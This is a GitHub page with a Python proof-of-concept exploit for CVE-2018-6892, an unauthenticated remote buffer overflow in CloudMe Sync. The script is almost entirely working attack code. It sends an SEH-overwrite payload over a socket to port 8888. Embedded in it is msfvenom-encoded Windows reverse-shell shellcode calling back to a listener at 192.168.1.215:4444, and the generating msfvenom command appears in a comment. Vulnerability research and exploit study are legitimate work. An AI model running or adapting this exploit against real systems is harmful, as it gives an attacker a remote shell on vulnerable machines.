-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathCVE-2018-6892-poc.py
73 lines (62 loc) · 2.95 KB
/
CVE-2018-6892-poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/usr/bin/env python
# poc for CVE-2018-6892 found by hyp3rlinx
# http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
#
# more:
# https://nvd.nist.gov/vuln/detail/CVE-2018-6892
# https://blogs.securiteam.com/index.php/archives/3669
# https://code610.blogspot.com/2018/07/cve-2018-6892-quick-autopsy.html
import socket
target = '127.0.0.1'
port = 8888
# total: 10k
## shellcode:
# root@kali:/home/c/src/ssd# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.215 LPORT=4444 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 1 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 351 (iteration=0)
# x86/shikata_ga_nai chosen with final size 351
# Payload size: 351 bytes
# Final size of c file: 1500 bytes
shellcode = (
"\xdd\xc2\xb8\x9c\x94\xfc\x26\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x13\x03\xde\x87\x1e\xd3\x22\x4f\x5c"
"\x1c\xda\x90\x01\x94\x3f\xa1\x01\xc2\x34\x92\xb1\x80\x18\x1f"
"\x39\xc4\x88\x94\x4f\xc1\xbf\x1d\xe5\x37\x8e\x9e\x56\x0b\x91"
"\x1c\xa5\x58\x71\x1c\x66\xad\x70\x59\x9b\x5c\x20\x32\xd7\xf3"
"\xd4\x37\xad\xcf\x5f\x0b\x23\x48\xbc\xdc\x42\x79\x13\x56\x1d"
"\x59\x92\xbb\x15\xd0\x8c\xd8\x10\xaa\x27\x2a\xee\x2d\xe1\x62"
"\x0f\x81\xcc\x4a\xe2\xdb\x09\x6c\x1d\xae\x63\x8e\xa0\xa9\xb0"
"\xec\x7e\x3f\x22\x56\xf4\xe7\x8e\x66\xd9\x7e\x45\x64\x96\xf5"
"\x01\x69\x29\xd9\x3a\x95\xa2\xdc\xec\x1f\xf0\xfa\x28\x7b\xa2"
"\x63\x69\x21\x05\x9b\x69\x8a\xfa\x39\xe2\x27\xee\x33\xa9\x2f"
"\xc3\x79\x51\xb0\x4b\x09\x22\x82\xd4\xa1\xac\xae\x9d\x6f\x2b"
"\xd0\xb7\xc8\xa3\x2f\x38\x29\xea\xeb\x6c\x79\x84\xda\x0c\x12"
"\x54\xe2\xd8\xb5\x04\x4c\xb3\x75\xf4\x2c\x63\x1e\x1e\xa3\x5c"
"\x3e\x21\x69\xf5\xd5\xd8\xfa\x3a\x81\xe3\x2d\xd2\xd0\xe3\xc0"
"\x7f\x5c\x05\x88\x6f\x08\x9e\x25\x09\x11\x54\xd7\xd6\x8f\x11"
"\xd7\x5d\x3c\xe6\x96\x95\x49\xf4\x4f\x56\x04\xa6\xc6\x69\xb2"
"\xce\x85\xf8\x59\x0e\xc3\xe0\xf5\x59\x84\xd7\x0f\x0f\x38\x41"
"\xa6\x2d\xc1\x17\x81\xf5\x1e\xe4\x0c\xf4\xd3\x50\x2b\xe6\x2d"
"\x58\x77\x52\xe2\x0f\x21\x0c\x44\xe6\x83\xe6\x1e\x55\x4a\x6e"
"\xe6\x95\x4d\xe8\xe7\xf3\x3b\x14\x59\xaa\x7d\x2b\x56\x3a\x8a"
"\x54\x8a\xda\x75\x8f\x0e\xfa\x97\x05\x7b\x93\x01\xcc\xc6\xfe"
"\xb1\x3b\x04\x07\x32\xc9\xf5\xfc\x2a\xb8\xf0\xb9\xec\x51\x89"
"\xd2\x98\x55\x3e\xd2\x88" )
evil = "\x90" * 20 + shellcode
junk = "A"*2232
nSEH = "\xEB\x06\x90\x90" # short jmp + 2NOPs
SEH = "\xce\x3d\x5e\x6d" # 0x6d5e3dce
padding = "D"*7760
payload = junk + nSEH + SEH + evil + padding
def exploit(target, payload):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(( target, port ))
s.send( payload )
print 'done.'
# goto immunity dbg now ;)
if __name__ == '__main__':
exploit(target, payload)
#